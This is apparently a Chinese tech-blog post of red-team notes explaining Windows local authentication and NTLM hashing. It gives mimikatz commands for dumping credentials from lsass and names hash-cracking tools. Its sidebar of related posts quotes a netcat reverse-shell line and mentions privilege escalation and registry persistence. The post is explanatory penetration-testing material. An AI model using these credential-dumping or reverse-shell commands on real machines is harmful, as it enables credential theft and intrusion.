红队笔记之Windows本地认证浅析

最新推荐文章于 2024-07-30 15:09:41 发布
最新推荐文章于 2024-07-30 15:09:41 发布
阅读量921 收藏 4
点赞数 1
分类专栏: 红队笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/corenote/article/details/120817024
版权

windows 1024程序员节

# 渗透测试之Windows本地认证浅析

文章目录

本地认证流程

众所周知在本地登陆Windows的情况下,人们通常会输入用户名和密码,如果用户名密码正确那么可以正常桌面,如果错误则无法进入桌面,那么操作系统是如何完成认证的过程的呢?

Windows的本地认证流程大致可以抽象为以下三个步骤;

1、由 winlogon.exe进程接受用户输入的密码

2、调用lsass.exe进程对用户输入的密码进行加密,将其转换为NTLM Hash

3、将有密码转换成的NTLM Hash与SAM文件中存储的NTLM Hash进行比较,如相同,将GroupSid与UserSid发送给winlogon.exe准备登陆,如不同则登陆失败

  • winlogon.exe即 Windows Logon Process,是Windows NT用户登陆程序,用于管理用户登录和退出。

  • lsass.exe即Local Security Authority Service,是Windows系统的安全机制。它用于本地安全和登陆策略。

  • SAM即Security Account Manager,是Windows对用户账户的安全管理使用的安全账号管理器,SAM文件即账号密码数据库文件。

    • SAM文件的默认存储路径为:%SystemRoot%\system32\config\sam

  • NTLM Hash是Windows所采用的一种加密算法,其流程如下;

    • 明文转换为16进制ASCII码

    • 使用little-endian(小端)序将其在转换为Unicode格式

    • 对所获取的 Unicode串进行标准MD4单向哈希,无论数据源有多少字节,MD4固定产生128-bit的哈希值

      例如:
admin                -> ASCII         = 61646d696e
61646d696e           -> Unicode       = 610064006d0069006e00
610064006d0069006e00 -> MD4           = 209c6174da490caeb422f3fa5a7ae634

本地密码的获取

本地密码的获取主要分为两个步骤;

1、获取lsass中的NTLM Hash

2、对NTLM Hash进行破解

  • 如无法破解也可以利用Pass The Hash完成不需要输入密码的NTLM协议认证流程,具体利用方法详见浅析Windows网络认证

获取lsass中的NTLM Hash

获取lsass中的NTLM Hash常用工具为mimikatz

mimikatz是法国人Gentil Kiwi编写的一款windows平台下的渗透测试神器,mimikatz可以从内存中提取明文密码、哈希、PIN 码和 kerberos 票证。mimikatz还可以执行哈希传递、票证传递或构建黄金票证。

具体操作步骤为:

1、使用管理员权限启动mimikatz.exe

2、获取调试权限

mimikatz # privilege::debug

3、获取登陆名与密码

mimikatz # sekurlsa::logonpasswords

如图获取管理员的HTLM为:de26cce0356891a4a020e7c4957afc72

image-20211017215342356

破解前可以使用tspkg,wdigest,kerberos模块提供的密码进行尝试

对NTLM Hash进行破解

hash,译作哈希或者散列,是指将任意长度的输入,经过散列算法生成固定长度的密文,也就是散列值。目前来说,hash函数主要有MD5、SHA1、NTLM等算法。 散列过程是不可逆的,并且可能存在多个输入对应着同一个散列值(哈希碰撞)。破解hash算法有字典攻击、查表法、反向查表法、彩虹表等多种方式。

在线破解网站推荐使用:cmd5、ophcrack

离线破解工具推荐使用:hashcat、john

以下以cmd5举例;

image-20211017215508558

方寸明光
关注
专栏目录
Windows认证 | Windows本地认证
无心的博客
09-27 2441
Windows的登陆密码是储存在系统本地的SAM文件中的,在登陆Windows的时候,系统会将用户输入的密码与SAM文件中的密码进行对比,如果相同,则认证成功。 SAM文件是位于`%SystemRoot%system32config`目录下的,用于储存本地所有用户的凭证信息,但是这并不代表着你可以随意去查看系统密码。 Windows本身是不会存储明文密码的,在SAM文件中所储存的是密码的hash...
红队笔记专属-shell备忘录
Gamma_lab的博客
04-02 4316
前言: ​ 建议直接复制粘贴到笔记,或点赞收藏,因为时常会用到,这是整理的一些常见的反向shell和特权提升的笔记文档,红队成员必会! 最全。 反向shell-备忘录: ​ 通常在获得远程代码执行之后,我们希望获得一些交互式访问—而不是发出单个命令获取单个回显或与 web shell 交互,从实战的意义来讲,反弹shell是非常有必要的,以下将从不同的工具出发, nc listen: nc -nlvp PORT connect: nc -e /bin/sh IP PORT or nc -c sh I
Windows本地认证
路虽远,行将至。事虽难,做必达。
03-06 4769
在本地登陆Windows的情况下,操作系统会使用用户输入的密码作为凭证去与系统中的密码进行验证,操作系统中的密码存储文件是什么?位置在哪里? %SystemRoot%\system32\config\sam Windows本地认证流程: winlogon.exe ==> 接收用户输入 ==> lsass.exe ==> 认证 首先,用户注销、重启、锁屏后,操作系统会让winlogon.exe显示登陆界面,也就是输入框界面,接收用户的输入信息后,将密码交给lsass进程,这.
windows认证之本地认证
hmysn的博客
01-01 2001
windows认证包括本地认证、网络认证和域认证三个部分windows认证和密码的抓取可以说是内网渗透的第一步。其中主要用到LM Hash和NTLMHash两种加密方式。
windows本地认证
09-09 375
哈希传递是能够在不需要账户明文密码的情况下完成认证的一个技术。它使用用户名对应的NTLM Hash将服务器给出的Chanllenge加密,生成一个response来完成认证。在内网渗透中,我们常常需要抓取管理员的密码、NTLM Hash来进行下一步渗透,他能帮助我们解决渗透中获取不到明文密码、破解不了NTLM Hash而又想扩大战果的问题。
Windows ❀ 本地认证
无糖可乐没有灵魂
05-24 548
Windows 本地认证 1、本地认证的基础知识 在本地登陆的情况下,操作系统会使用用户输入的密码作为凭据去与系统中的密码进行校验,如果成功的话表明验证通过,操作系统的密码存储在C盘的目录下: C:\Windows\System32\config\SAM SAM用于存储本地所有用户的凭证信息,但是这并不代表你可以随意查看系统密码,我们登陆系统的时候系统会自动读取SAM文件中的密码与我们输入的密码进行比对,如果认证相同则登陆成功; Windows自身是不会保持明文密码的,SAM文件中保存的为Hash值; H
红队笔记:技巧,窍门和技巧的串联
02-25
红队笔记 提示,技巧和技巧的串联。 当前主题:文件传输
057-红队测试之Windows提权小结.pdf
09-20
内核漏洞利用是 Windows 提权的常见方法之一。攻击者可以通过利用操作系统的漏洞来执行具有更高权限的任意代码。例如,MS16-032 漏洞是一个常见的内核漏洞,可以被攻击者利用来获得更高的访问权限。 要检测 Windows...
046-红队之浅谈基于Windows telemetry的权限维持.pdf
09-20
"红队浅谈基于Windows telemetry的权限维持" Windows Telemetry是一种强大的监控工具,红队可以使用它来维持权限,以下是相关知识点: 一、 Windows Telemetry 简介 Windows Telemetry是Windows操作系统中的一个...
红队技巧:隐藏windows服务1
08-03
本文将探讨一种红队技巧,即如何使用PowerShell隐藏Windows服务,以提高在后渗透测试阶段的持久性和隐蔽性。 首先,创建一个Windows服务是维持权限的关键步骤。使用命令行工具`sc`,我们可以创建一个名为`mrxn`的...
第22章 本地身份认证方式(也被称为:Cookie身份认证方式)登录实现
zhoujian_911的专栏
03-03 697
080 NopAuthenticationDefaults、CustomerLoggedOutEvent、IModelAttribute、NopResourceDisplayNameAttribute、LoginModel NopAuthenticationDefaults类,通过该类所定义的常量,为当前程序中的身份认证操作的实现提供相应的数据值。 CustomerLoggedOutEvent类,“EventPublisher.PublishAsync”方法通过调用该类的实例,...
简单的本地验证
hades's stack
06-10 2116
本实验是简单的登录界面—EditText编辑框的应用,在该界面中,若输入正确的用户名(假设为e1001)和密码(假设为1234567),单击“确定”按钮,将出现一个Toast提示“恭喜您登录成功!”;否则将提示“请输入正确的用户名或密码!”。单击“清空”按钮,则会清空所填写的姓名和密码内容。activity_main.xml<?xml version="1.0" encoding="utf-8"?>
Windows认证机制
qq_58000413的博客
06-05 848
本地认证中用来处理用户输入密码的进程即lsass.exe,密码会在这个进程中明文保存,供该进程将密码计算成NTLM hash与sam进行比对,我们使用mimikatz来获取的明文密码,便是在这个进程中读取到的。其中关键点在于:第二步中客户端发送的是NTLM哈希值,于随机字符串的加密结果,而这个NTLM哈希是由御用输入的密码本地计算得出的,所以在这个步骤中,只要能提供正确的NTLM哈希即使步知道正确的密码也可以通过认证。这里challenge相当于加密的密钥,challenge1为密码加密的结果。
本地操作系统认证登录
ai20110304的专栏
07-08 1954
本地操作系统认证登录一、简述二、实战案例2.1 忘记SYSDBA密码咋整步骤1:dm.ini手工打开 ENABLE_LOCAL_OSAUTH 参数步骤2:系统添加组dmdba步骤3:将数据库安装用户加入dmdba附加组步骤4:disql免密登录,修改新密码步骤5:验证新密码登录2.2 普通用户开启本地系统认证步骤1: 添加用户组与用户步骤2:数据库内部添加系统用户同名的数据库账户步骤3:验证spiker用户免密登录三、归纳总结 一、简述 平常很多人用惯Oracle数据库本地登录认证(即本地系统登录认证),
windows认证过程
weixin_45682070的博客
08-01 1086
windows认证过程 </h1> <div class="clear"></div> <div class="postBody"> 更新_2020_01_16 NTLM简介: NTLM使用在Windows NT和Windows 2000 Server(or later)工作组环境中(Kerberos用在域模式下)。在AD域环境中,如果需要认证Windows N...
AAA配置采用本地方式进行认证和授权
qq_28776313的博客
05-31 1168
1.1配置本地服务器 配置本地用户:创建本地用户,设备根据创建的用户信息对本地用户进行认证。 配置授权规则:在设备上创建相应的授权规则,本地授权时可以根据创建的授权规则对用户授权。 1.2配置并应用AAA方案 配置AAA方案:业务方案中也可以配置用户的授权信息。 配置业务方案(可选):业务方案中也可以配置用户的授权信息。 在域下应用AAA方案:创建好的AAA方案和业务方案需要绑定到用户所属域下才能生效。
内网基础——Windows认证
最新发布
qq_55202378的博客
07-30 1019
整个NTLM协议的流程图如下(工作组环境):域环境下的NTLM认证又有所不同:域环境下,使用域用户登录远程主机,因为域用户的用户名密码保存在域控上,所有验证阶段是由域控进行response的对比。
windows本地修改git认证信息
Edward·Che的博客
12-02 1585
有时候弹窗让你输入信息,要么你后期想改,要么你第一次输入错了要改,那么就得这样改:
Windows安全认证机制——NTLM本地认证
lurenjia404的博客
07-02 952
Windows安全认证机制之NTLM本地认证
Windows红队持久性:注册表运行键技术解析
"这篇文档详细介绍了在Windows环境中如何利用注册表运行键来实现权限的持久化,这是红队渗透测试中常见的技术手段。文档强调了持久性在红队行动中的重要性,允许攻击者在不失去与C&C(指挥与控制)服务器连接的情况...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

方寸明光

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值